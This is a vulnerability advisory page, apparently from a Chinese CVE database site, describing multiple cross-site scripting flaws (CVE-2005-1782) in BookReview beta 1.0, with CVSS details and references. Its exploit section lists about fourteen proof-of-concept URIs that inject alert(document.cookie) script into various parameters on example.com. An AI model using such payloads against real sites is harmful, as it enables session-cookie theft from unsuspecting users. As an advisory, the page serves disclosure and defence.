CVE-2005-1782
CVSS4.3
发布时间 :2005-05-26 00:00:00
修订时间 :2008-09-05 16:50:05
NMCOS    

[原文]Multiple cross-site scripting (XSS) vulnerabilities in BookReview beta 1.0 allow remote attackers to inject arbitrary web script or HTML via the node parameter to (1) add_review.htm, (2) suggest_review.htm, (3) suggest_category.htm, (4) add_booklist.htm, or (5) add_url.htm, the isbn parameter to (6) add_review.htm, (7) add_contents.htm, (8) add_classification.htm, the (9) chapters parameter to the add_contents page in index.php (aka add_contents.htm), (10) the user parameter to contact.htm, or (11) the submit[string] parameter to search.htm. NOTE: it is not clear whether BookReview is available to the public. If not, then it should not be included in CVE.


[CNNVD]BookReview多个跨站脚本攻击漏洞(CNNVD-200505-1210)

        BookReview beta 1.0存在多个跨站脚本攻击(XSS)漏洞,远程攻击者可以通过传给(1)add_review.htm,(2)suggest_review.htm,(3)suggest_category.htm,(4)add_booklist.htm或(5)add_url.htm的结点参数,传给(6)add_review.htm,(7)add_contents.htm,(8)add_classification.htm的isbn参数,传给index.php(又称add_contents.htm)内的add_contents页的(9)chapters参数,传给contact.htm的(10)user参数,或者传给search.htm的(11)submit[string]参数,注入任意Web脚本或HTML。

- CVSS (基础分值)

CVSS分值: 4.3 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1782
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1782
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-1210
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/13783
(VENDOR_ADVISORY)  BID  13783
http://www.osvdb.org/16879
(VENDOR_ADVISORY)  OSVDB  16879
http://www.osvdb.org/16878
(VENDOR_ADVISORY)  OSVDB  16878
http://www.osvdb.org/16877
(VENDOR_ADVISORY)  OSVDB  16877
http://www.osvdb.org/16876
(VENDOR_ADVISORY)  OSVDB  16876
http://www.osvdb.org/16875
(VENDOR_ADVISORY)  OSVDB  16875
http://www.osvdb.org/16874
(VENDOR_ADVISORY)  OSVDB  16874
http://www.osvdb.org/16873
(VENDOR_ADVISORY)  OSVDB  16873
http://www.osvdb.org/16872
(VENDOR_ADVISORY)  OSVDB  16872
http://www.osvdb.org/16871
(VENDOR_ADVISORY)  OSVDB  16871
http://securitytracker.com/id?1014058
(VENDOR_ADVISORY)  SECTRACK  1014058
http://lostmon.blogspot.com/2005/05/bookreview-10-multiple-variable-xss.html
(VENDOR_ADVISORY)  MISC  http://lostmon.blogspot.com/2005/05/bookreview-10-multiple-variable-xss.html

- 漏洞信息

BookReview多个跨站脚本攻击漏洞
中危 跨站脚本
2005-05-26 00:00:00 2006-08-23 00:00:00
远程  
        BookReview beta 1.0存在多个跨站脚本攻击(XSS)漏洞,远程攻击者可以通过传给(1)add_review.htm,(2)suggest_review.htm,(3)suggest_category.htm,(4)add_booklist.htm或(5)add_url.htm的结点参数,传给(6)add_review.htm,(7)add_contents.htm,(8)add_classification.htm的isbn参数,传给index.php(又称add_contents.htm)内的add_contents页的(9)chapters参数,传给contact.htm的(10)user参数,或者传给search.htm的(11)submit[string]参数,注入任意Web脚本或HTML。

- 公告与补丁

        暂无数据

- 漏洞信息

16871
BookReview add_review.htm Multiple Parameter XSS
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

BookReview contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate multiple variables upon submission to the add_review.htm script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity or confidentiality.

- 时间线

2005-05-26 2005-04-27
2005-05-26 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

BookReview Multiple Cross-Site Scripting Vulnerabilities
Input Validation Error 13783
Yes No
2005-05-26 12:00:00 2009-07-12 02:56:00
Lostmon <lostmon@gmail.com> is credited with the discovery of these vulnerabilities.

- 受影响的程序版本

BookReview BookReview 1.0

- 漏洞讨论

BookReview is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.

- 漏洞利用

No exploit is required.

The following proof of concept URI are available:
http://www.example.com/add_review.htm?isbn=0801052319&amp;node=%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp;review=true
http://www.example.com/add_review.htm?isbn=0801052319%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp;node=Political_Science&amp;review=true
http://www.example.com/add_review.htm?isbn=0553278223&amp;node="&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&amp;review=true
http://www.example.com/add_review.htm?node=index&amp;isbn=\\"&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
http://www.example.com/index.php?page=add_contents&amp;isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp;chapters=25
http://www.example.com/index.php?page=add_contents&amp;isbn=083081423X&amp;chapters=25%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/add_contents.htm?isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/suggest_category.htm?node=Agriculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/contact.htm?user=admin%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/add_booklist.htm?node=Agriculture_and_Aquaculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/add_url.htm?node=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/search.htm?page=search&amp;submit%5Bstring%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&amp;submit=Ok&amp;submit%5Btype%5D=author
http://www.example.com/add_classification.htm?isbn=0830815961%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp;node=Gospels
http://www.example.com/suggest_review.htm?node=Business_and_Economics"&gt;&lt;SCRIPT&gt;alert()&lt;/SCRIPT&gt;

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站